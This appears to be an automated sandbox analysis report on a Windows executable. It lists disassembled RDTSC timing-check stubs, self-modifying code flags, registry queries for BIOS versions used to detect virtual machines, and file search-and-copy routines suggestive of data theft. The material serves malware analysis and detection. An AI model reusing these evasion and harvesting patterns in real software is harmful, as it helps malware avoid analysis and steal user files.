                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC27E2 second address: EC280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47DCFB8A48h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d jg 00007F47DCFB8A36h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC280E second address: EC2814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2814 second address: EC281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC281C second address: EC2833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F47DD40FB7Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2ACD second address: EC2ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2ADE second address: EC2AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2AE4 second address: EC2AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2AED second address: EC2AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC34ED second address: EC34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F47DCFB8A36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC34FC second address: EC3530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F47DD40FB87h 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F47DD40FB76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47DD40FB7Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0B7 second address: DFA0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0C0 second address: DFA0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0C4 second address: DFA0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F47DCFB8A38h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0D8 second address: DFA0F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB84h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0F0 second address: DFA110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F47DCFB8A44h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA110 second address: DFA115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC9B2F second address: EC9B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC9B33 second address: EC9B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDB909 second address: EDB946 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47DCFB8A3Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F47DCFB8A42h 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47DCFB8A41h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBAB3 second address: EDBABF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBABF second address: EDBAFD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A3Eh 0x00000008 push edx 0x00000009 jmp 00007F47DCFB8A3Fh 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47DCFB8A40h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBAFD second address: EDBB0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBB0D second address: EDBB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD774 second address: EDD787 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F47DD40FB76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD787 second address: EDD79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A40h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98F9 second address: EE98FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98FF second address: EE9905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9905 second address: EE991A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F47DD40FB7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE991A second address: EE9920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9785 second address: EE979E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47DD40FB84h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC56C second address: EEC570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC570 second address: EEC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B55 second address: EF3B65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B65 second address: EF3B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B69 second address: EF3B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B6D second address: EF3B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B75 second address: EF3B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B7B second address: EF3BC3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47DD40FB76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F47DD40FB7Eh 0x00000015 pop ecx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F47DD40FB86h 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007F47DD40FB7Bh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF250A second address: EF2510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2510 second address: EF2514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF264E second address: EF2652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2652 second address: EF266C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DD40FB84h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2821 second address: EF2842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F47DCFB8A47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2842 second address: EF284C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF284C second address: EF2864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2864 second address: EF286A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF286A second address: EF2887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F47DCFB8A36h 0x0000000b jmp 00007F47DCFB8A3Ch 0x00000010 popad 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF29B7 second address: EF29D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47DD40FB76h 0x0000000a pop edx 0x0000000b jmp 00007F47DD40FB7Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2C71 second address: EF2CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A43h 0x00000007 jmp 00007F47DCFB8A43h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F47DCFB8A41h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2E19 second address: EF2E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF38AE second address: EF38B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050CC second address: F050D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050D2 second address: F050D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050D6 second address: F050DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050DC second address: F050E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050E8 second address: F050EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050EC second address: F050F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04F8E second address: F04F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04F92 second address: F04FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F068F5 second address: F068FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F068FB second address: F06917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F47DCFB8A41h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0674D second address: F06777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Fh 0x00000009 popad 0x0000000a jmp 00007F47DD40FB80h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06777 second address: F0677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14244 second address: F1427C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47DD40FB76h 0x00000008 jmp 00007F47DD40FB80h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F47DD40FB8Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E028E8 second address: E028EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F15DD8 second address: F15DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F15DDC second address: F15DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DCFB8A3Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BB7 second address: F24BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BBD second address: F24BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jo 00007F47DCFB8A3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BCD second address: F24BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24E69 second address: F24E7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47DCFB8A36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007F47DCFB8A36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24E7F second address: F24E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25586 second address: F255A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F47DCFB8A36h 0x0000000a popad 0x0000000b jns 00007F47DCFB8A42h 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F255A8 second address: F255B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F47DD40FB76h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2570A second address: F2572A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F47DCFB8A4Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2707B second address: F2707F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2707F second address: F27088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27088 second address: F27095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27095 second address: F270A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F47DCFB8A36h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29CAB second address: F29D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jne 00007F47DD40FB8Fh 0x0000000d nop 0x0000000e mov dx, bx 0x00000011 push 00000004h 0x00000013 mov edx, dword ptr [ebp+122D3A28h] 0x00000019 jmp 00007F47DD40FB87h 0x0000001e call 00007F47DD40FB79h 0x00000023 push edx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 pop edx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557033C second address: 5570383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 6EEC5DA3h 0x00000010 jmp 00007F47DCFB8A48h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F47DCFB8A3Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570383 second address: 5570398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570398 second address: 55703A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A3Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55703A8 second address: 557040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F47DD40FB87h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47DD40FB84h 0x00000017 or cl, 00000008h 0x0000001a jmp 00007F47DD40FB7Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F47DD40FB87h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557040C second address: 5570429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5570429 second address: 557042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557042F second address: 5570433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F557 second address: E4F55C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CA1CC9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CA1C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E40BC0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E3FB1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C9F1EE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ECB5EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
